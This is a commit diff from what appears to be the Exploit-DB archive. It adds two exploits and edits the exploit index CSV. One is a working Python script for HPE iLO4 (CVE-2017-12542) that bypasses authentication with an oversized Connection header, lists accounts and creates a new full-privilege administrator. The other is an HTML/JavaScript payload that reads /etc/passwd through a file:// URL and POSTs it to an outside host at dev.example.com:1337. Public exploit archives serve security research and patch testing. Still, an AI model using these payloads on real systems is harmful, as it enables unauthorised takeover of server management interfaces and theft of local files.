DB: 2018-02-09
2 changes to exploits/shellcodes Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow Abuse-SDL 0.7 - Command Line Argument Buffer Overflow MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color() MuPDF 1.3 - 'xps_parse_color()' Stack Buffer Overflow Marked2 - Local File Disclosure HPE iLO4 < 2.53 - Add New Administrator User
This commit is contained in:
Offensive Security
parent
2c4b08963a
commit
79b9c08b88
3 changed files with 138 additions and 2 deletions
20
exploits/multiple/local/44006.html
Normal file
20
exploits/multiple/local/44006.html
Normal file
|
|
@ -0,0 +1,20 @@
|
|||
<body>
|
||||
<script>
|
||||
var file = "file:///etc/passwd";
|
||||
var extract = "http://dev.example.com:1337/";
|
||||
function get(url) {
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
xmlHttp.open("GET", url, false);
|
||||
xmlHttp.send(null);
|
||||
return xmlHttp.responseText;
|
||||
}
|
||||
function steal(data) {
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open('POST', extract, true);
|
||||
xhr.onload = function() {};
|
||||
xhr.send(data);
|
||||
}
|
||||
var cdl = get(file);
|
||||
steal(cdl);
|
||||
</script>
|
||||
</body>
|
||||
114
exploits/multiple/remote/44005.py
Executable file
114
exploits/multiple/remote/44005.py
Executable file
|
|
@ -0,0 +1,114 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Exploit trigger was presented @reconbrx 2018
|
||||
|
||||
Vulnerability found and documented by synacktiv:
|
||||
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html
|
||||
|
||||
Original advisory from HP:
|
||||
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
|
||||
|
||||
Other advisories for this CVE:
|
||||
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
|
||||
https://securitytracker.com/id/1039222
|
||||
|
||||
IMPORTANT:
|
||||
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
|
||||
The two other vulns are critical as well, but only triggerable on the host itself.
|
||||
|
||||
|
||||
"""
|
||||
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
import json
|
||||
import urllib3
|
||||
|
||||
#all of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
exploit_trigger = {'Connection' : 'A'*29}
|
||||
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'
|
||||
|
||||
|
||||
|
||||
def test(ip):
|
||||
|
||||
url = accounts_url % ip
|
||||
try:
|
||||
response = requests.get(url, headers = exploit_trigger, verify = False)
|
||||
except Exception as e:
|
||||
return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
|
||||
|
||||
try:
|
||||
data = json.loads(response.text)
|
||||
except Exception as e:
|
||||
return False, 'Target response not as exected!, Exception data: %s' % (str(e),)
|
||||
|
||||
return True, data
|
||||
|
||||
def exploit(ip, username, password):
|
||||
Oem = {
|
||||
'Hp' : {
|
||||
'LoginName' : username,
|
||||
'Privileges': {
|
||||
'LoginPriv' : True,
|
||||
'RemoteConsolePriv': True,
|
||||
'UserConfigPriv' : True,
|
||||
'VirtualMediaPriv': True,
|
||||
'iLOConfigPriv':True,
|
||||
'VirtualPowerAndResetPriv':True,
|
||||
}
|
||||
}
|
||||
}
|
||||
body = {
|
||||
'UserName':username,
|
||||
'Password':password,
|
||||
'Oem':Oem
|
||||
}
|
||||
url = accounts_url % ip
|
||||
|
||||
|
||||
|
||||
try:
|
||||
response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
|
||||
except Exception as e:
|
||||
return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
|
||||
|
||||
if response.status_code in [requests.codes.ok, requests.codes.created]:
|
||||
return True, response.text
|
||||
else:
|
||||
return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)
|
||||
|
||||
if __name__ == '__main__':
|
||||
import argparse
|
||||
import sys
|
||||
parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
|
||||
parser.add_argument('ip', help='target IP')
|
||||
parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
|
||||
parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
|
||||
parser.add_argument('-u', help='username of the new admin user')
|
||||
parser.add_argument('-p', help='password of the new admin user')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.e:
|
||||
if args.u is None or args.p is None:
|
||||
print('Username and password must be set for exploiting!')
|
||||
sys.exit()
|
||||
res, data = exploit(args.ip, args.u, args.p)
|
||||
if res:
|
||||
print('[+] Sucsessfully added user!')
|
||||
else:
|
||||
print('[-] Error! %s' % data)
|
||||
|
||||
elif args.t:
|
||||
res, data = test(args.ip)
|
||||
if res:
|
||||
print('[+] Target is VULNERABLE!')
|
||||
for i in data['Items']:
|
||||
print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
|
||||
else:
|
||||
print('[-] Error! %s' % data)
|
||||
|
|
@ -8257,7 +8257,7 @@ id,file,description,date,author,type,platform,port
|
|||
22779,exploits/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding",2003-06-16,"Noam Rathaus",local,windows,
|
||||
22781,exploits/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",local,linux,
|
||||
22806,exploits/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,local,linux,
|
||||
22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,local,bsd,
|
||||
22811,exploits/bsd/local/22811.c,"Abuse-SDL 0.7 - Command Line Argument Buffer Overflow",2003-06-19,Matrix_DK,local,bsd,
|
||||
22813,exploits/linux/local/22813.c,"Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure",2003-06-20,IhaQueR,local,linux,
|
||||
22815,exploits/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,local,linux,
|
||||
40409,exploits/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",local,windows,
|
||||
|
|
@ -8652,7 +8652,7 @@ id,file,description,date,author,type,platform,port
|
|||
30839,exploits/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation",2007-12-03,"Bas van Schaik",local,linux,
|
||||
30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows,
|
||||
31036,exploits/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",local,windows,
|
||||
31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows,
|
||||
31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - 'xps_parse_color()' Stack Buffer Overflow",2014-01-20,"Jean-Jamil Khalife",local,windows,
|
||||
31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow",2008-02-12,forensec,local,linux,
|
||||
31182,exploits/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",local,windows,
|
||||
31346,exploits/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)",2014-02-02,saelo,local,linux,
|
||||
|
|
@ -9319,6 +9319,7 @@ id,file,description,date,author,type,platform,port
|
|||
43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
|
||||
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
|
||||
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
|
||||
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
|
||||
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
|
||||
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
|
||||
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
|
||||
|
|
@ -16005,6 +16006,7 @@ id,file,description,date,author,type,platform,port
|
|||
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,
|
||||
44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
|
||||
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
|
||||
44005,exploits/multiple/remote/44005.py,"HPE iLO4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
|
||||
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
|
||||
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
|
||||
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue